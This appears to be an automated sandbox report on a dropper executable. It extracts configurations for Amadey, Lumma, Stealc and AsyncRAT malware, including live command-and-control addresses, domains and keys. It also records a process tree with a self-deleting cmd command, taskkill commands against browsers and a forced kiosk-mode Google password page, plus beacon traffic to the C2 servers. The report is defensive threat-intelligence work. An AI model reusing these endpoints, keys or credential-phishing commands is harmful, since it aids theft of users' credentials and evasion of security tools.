Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/12/2024, 19:47 UTC

General

  • Target

    1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe

  • Size

    6.9MB

  • MD5

    5690ba1d0f23125e6a250ad945bb0f61

  • SHA1

    735ea7ae82ffcfa15cb8de133a2cd29ffb2f294e

  • SHA256

    1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636

  • SHA512

    6262d48e3ea0c5e1ca0f91b5950749ccddc36a53b82a12d1443f6d3b84e6e0b4164d347a5a9bfe2f0796d9f733e38cb4de1acb79da362f72d9dcef682d5bfd46

  • SSDEEP

    196608:Gamkq+z5p/OtyEeJiwXW65oY3GEmR7+2cVau:bmkqc9O/6fW6aY3GfR7+dQu

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
JrMOaJuxfZSKWpOLEGsB7P6ZlsENcx9t

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Asyncrat family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe
    "C:\Users\Admin\AppData\Local\Temp\1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3192
            • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
              "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1904
            • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
              "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4944
            • C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe
              "C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2508
            • C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe
              "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4932
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe" & rd /s /q "C:\ProgramData\K6PZCBASJEKF" & exit
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:652
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 10
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:1460
            • C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe
              "C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4192
            • C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe
              "C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4348
            • C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe
              "C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3168
            • C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe
              "C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4836
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4772
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1592
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4924
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4620
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3112
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                PID:3416
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  8⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:3524
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02d52b29-747a-4ce7-bb5f-e416e8ddc916} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" gpu
                    9⤵
                    PID:4624
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2472 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baba7b08-c019-4c12-ba76-e5b3a7bc7b35} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" socket
                    9⤵
                    PID:3992
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2772 -childID 1 -isForBrowser -prefsHandle 3224 -prefMapHandle 2968 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6b6c773-fec5-46fb-bba4-66b3573bf358} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                    9⤵
                    PID:1484
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b83ef54b-e711-400f-8d5d-51d4e4a94eb3} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                    9⤵
                    PID:1768
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4476 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4564 -prefMapHandle 4560 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d8f691-c1fe-4f74-8341-77f11ffedd68} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" utility
                    9⤵
                    • Checks processor information in registry
                    PID:6500
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5208 -prefMapHandle 5200 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {508ed6b7-1ada-4a5c-bed5-b1d75b888bd6} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                    9⤵
                    PID:7000
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 4 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e1aaec9-91b2-4eab-88be-c9e847a9e2e3} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                    9⤵
                    PID:7092
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 5 -isForBrowser -prefsHandle 5544 -prefMapHandle 5548 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {784a43c1-049e-47c6-85fc-1e24d1569e33} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                    9⤵
                    PID:7104
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1384
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2720
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Windows security modification
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3360
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3288
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:2900

                  Network

                  • flag-us
                    DNS
                    8.8.8.8.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    8.8.8.8.in-addr.arpa
                    IN PTR
                    Response
                    8.8.8.8.in-addr.arpa
                    IN PTR
                    dnsgoogle
                  • flag-us
                    DNS
                    58.55.71.13.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    58.55.71.13.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    90.210.23.2.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    90.210.23.2.in-addr.arpa
                    IN PTR
                    Response
                    90.210.23.2.in-addr.arpa
                    IN PTR
                    a2-23-210-90deploystaticakamaitechnologiescom
                  • flag-us
                    DNS
                    atten-supporse.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    atten-supporse.biz
                    IN A
                    Response
                    atten-supporse.biz
                    IN A
                    104.21.96.1
                    atten-supporse.biz
                    IN A
                    104.21.16.1
                    atten-supporse.biz
                    IN A
                    104.21.64.1
                    atten-supporse.biz
                    IN A
                    104.21.112.1
                    atten-supporse.biz
                    IN A
                    104.21.48.1
                    atten-supporse.biz
                    IN A
                    104.21.80.1
                    atten-supporse.biz
                    IN A
                    104.21.32.1
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    2g5323.exe
                    Remote address:
                    104.21.96.1:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=p3prmk69gnhourrf473igrlq19; expires=Sat, 05-Apr-2025 13:34:01 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJWMCU1OJlDXMIjn%2B7Wyot8xfnZNa5GgzamayBySplnGUhHpFMzMWs8SP0%2FDf%2FCLR39ggt76Zoz7pGZzoh1x53lvm1T5gxTBRLBaaDJ0THwX0Yp7t61SGj5BLVj%2FGmXLQZHh7Ng%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbf0e5ecb7708-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=61534&min_rtt=60535&rtt_var=24700&sent=9&recv=9&lost=0&retrans=3&sent_bytes=6352&recv_bytes=609&delivery_rate=19800&cwnd=250&unsent_bytes=0&cid=92ea845424aacb63&ts=743&x=0"
                  • flag-us
                    DNS
                    138.32.126.40.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    138.32.126.40.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    95.221.229.192.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    95.221.229.192.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    1.96.21.104.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    1.96.21.104.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    zinc-sneark.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    formy-spill.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    formy-spill.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    covery-mover.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    covery-mover.biz
                    IN A
                    Response
                    covery-mover.biz
                    IN A
                    172.67.206.64
                    covery-mover.biz
                    IN A
                    104.21.58.186
                  • flag-us
                    POST
                    https://covery-mover.biz/api
                    2g5323.exe
                    Remote address:
                    172.67.206.64:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: covery-mover.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=cp998734365gjeifb4citnmg2e; expires=Sat, 05-Apr-2025 13:34:01 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2Bz5mueI0688qRsfa5HiKGOcr5Cr9bTApfVoU2%2FOZWpMLilRvafLgmwfdnfjeQfzDOHMPcVjQT%2FzqC6B%2B%2B3d%2BjqbTJQxa31xoAWXkP7RkLLVsTzwYN0aAvt8fvfnnPzi9u6E"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbf12b9dbcd2a-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=60930&min_rtt=50434&rtt_var=16965&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=73823&cwnd=253&unsent_bytes=0&cid=f753dddbaae7542a&ts=261&x=0"
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 4
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 158
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • [RU]
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
